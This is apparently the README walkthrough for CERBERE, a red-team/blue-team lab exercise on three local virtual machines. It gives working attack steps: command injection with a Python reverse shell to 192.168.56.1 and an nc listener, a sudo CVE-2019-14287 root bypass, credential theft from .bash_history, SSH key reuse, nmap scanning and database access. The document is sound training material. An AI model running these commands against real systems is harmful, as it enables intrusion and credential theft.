# CERBERE

CERBERE (Cybersecurity Exercise for Red and Blue team Entertainment, Reproducibility and Experience) is a
proof-of-concept scenario entirely formalized, refined then deployed using URSID.
It was played at a local university by a team of around 15 students, as part of a red-team/blue-team exercise.

CERBERE includes:

- 3 machines, 2 including websites (which will be accessible from a local network), all equipped with auditd logging.
- 6 attack positions.
- 7 procedures, spread through 4 ATT&CK techniques.

![CERBERE tech](./imgs/scenario_cerbere_technique.png)*Graphical representation of the CERBERE scenario on a technical
level.*

## Zagreus

### T1190: Exploit Public-Facing Application (2 possible procedures).

- Access the website by opening 192.168.56.2:3000 in your browser (might require http instead of https!).
- This machine hosts a node.js website executed as user *alice*, which is vulnerable to command injection.
- Indeed, a misconfiguration in how piping is handled by the parser leads to command execution by running

```bash
anycommand | YOURCOMMAND
```

- This command injection is accessible through the search function on the profile page, accessible after creating a
  profile.
- This vulnerability can be found either by trial and error, or using tools such
  as [Burp](https://portswigger.net/burp/communitydownload).

#### Procedure 1: Command injection (no character limit)

- In particular this lets the attacker access a shell, for instance by opening a listener with

```bash
nc -nlvp 8888
```

on the host machine, and launching a reverse shell with

```bash
hop | python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",8888));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```

on the website injection when used locally.

- Note that it is possible to directly connect to your reverse shell because the virtual machines are deployed in a
  local network.
- If your network setup is different and you wish to exploit the website remotely, you might need to use a tool such
  as [ngrok](https://ngrok.com/)
  to act as a middle man.

#### Procedure 2: Command injection (character limit)

- If executing the above command gives you an error, it means you randomly got the harder version of the website.
- This version limits the maximum number of characters in a query to 50.
- Fortunately, you use the upload function to add a script opening a remote shell, then executing the script through the
  search command.
- If the profile "test" was created, any images uploaded will be in the ./public/images/test/ repository.
- You may also have to use chmod to give it execution privileges.
- A useful trick to save some characters is to use wildcards in paths (such as using ./pub*/im*/test/ instead of the
  above).

### T1068: Exploitation for Privilege Escalation.

#### Procedure 1: Vulnerable sudo package ([CVE-2019-14287](https://www.exploit-db.com/exploits/47502))

- The machine may be vulnerable to a privilege escalation coming from the sudo package being an old version.
- You may find this out by running _sudo -v_.
- If this is the case, the sudoers file will have been edited to allow alice to execute commands
  as anyone except root (run _sudo -l_ to check).
- This can be bypassed with sudo -u#-1 command.
- For instance, to acess a file you're not supposed to:

```bash
sudo -u#-1 cat .bash_history
```

- But you can also just open a shell with root privileges

```bash
sudo -u#-1 /bin/bash
```

##### Procedure 2: Vulnerable pkexec process ([CVE-2021-4034](https://nvd.nist.gov/vuln/detail/cve-2021-4034))

- The machine may also be vulnerable to a privilege escalation coming from the OS being an old version.
- You may find the version of your OS by running _hostnamectl_. If this indicates you are on Ubuntu 16.04, this is the
  exploit you'll have to use.
- Tools such as [LinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) are also able to find this.
- Several online resources indicate how to exploit this vulneraiblity and get a root
  shell [example](https://github.com/berdav/CVE-2021-4034)).

#### T1552: Unsecured Credentials (2 procedures)

- This machine will contain a password to be reused to access machine Hades.
- This password will be stored somewhere in the superuser home directory.
- It is possible to find out about the superuser by checking the /etc/passwd file or just checking the /home directory.

#### Procedure 1: Passwords in .txt.

- /home/superuser will contain a file named _important.txt_, containing the relevant user credentials.

#### Procedure 2: Passwords in .bash_history.

- /home/superuser/.bash_history will contain the relevant user credentials.

## Hades

### T1190: Exploit Public-Facing Application (1 procedure).

#### Procedure 1: Django website with directory traversal.

- Access the website with 192.168.56.3:8000 (might require http instead of https!).
- This machine hosts a django website executed as user *bob*, which will be vulnerable to a directory traversal.
- This will also let attackers reuse credentials acquired in machine Zagreus.
- A SSH key may be found in the /notes/ directory (ie 192.168.56.3:8000/admin/notes).
- You may find out about this directory by checking the error you get when trying to access an invalid directory.

### T1021: Remote Services (1 procedure).

#### Procedure 1: Remote Services through SSH, reusing a SSH key.

- This SSH key may be used to access the superuser privileged account. This however has to be done from the internal
  network, aka machine zagreus.
- The key is a single line on the notes directory, and needs to be converted back to the proper key format.
- Open your prefered text editor and replace every space with a new line.
- The note also contains information about the user.
- The bash we get from the command injection is a bit janky (can't use CTRL commands, so can't use nano), making it
  annoying to paste the key there.
- You may still however copy paste things using right click. It may also be possible to upgrade the shell using external
  tools.
- Since you have root access on zagreus, you can install nmap there and run a scan on the local network.
- You can get the ip of the local network using the *ip a* command, which will give you the local ip of zagreus.
- For instance, if the local zagreus ip is 10.35.60.12, the subnetwork will be 10.35.60.0/24.
- You may thus run (from a root shell on zagreus)

```bash
sudo apt install nmap
nmap 10.35.60.0/24 -vv
```

- This will give you the ips of hades and melinoe and their open ports. Use the hades IP to access it through ssh.

```bash
touch key
echo 'COPY_PASTE_YOUR_KEY_HERE' >> key
chmod 600 key 
ssh superuser@HADES_IP -i key
```

### T1552: Unsecured Credentials (2 procedures).

- Functionally identical to the one in Zagreus.
- This machine will contain a password to be reused to access machine Hades.
- This password will be stored somewhere in the superuser home directory.
- It is possible to find out about the superuser by checking the /etc/passwd file or just checking the /home directory.

#### Procedure 1: Passwords in .txt.

- /home/superuser will contain a file named _important.txt_, containing the relevant user credentials.

#### Procedure 2: Passwords in .bash_history.

- /home/superuser/.bash_history will contain the relevant user credentials.

## Melinoe

### T1021: Remote Services (1 procedure)

#### Procedure 1: Remote SQL access to a database containing a flag.

- Hades comes with psql pre-installed (it'd make sense for an admin there to have it).
- Access the machine through its open postgresql service using the password you found before.

```bash 
psql -h 192.168.56.4 -p 5432 -U postgres 
```

- This database will containg a unique entry referring to an image path on the machine. Finding this entry is
  effectively
  the end of this scenario.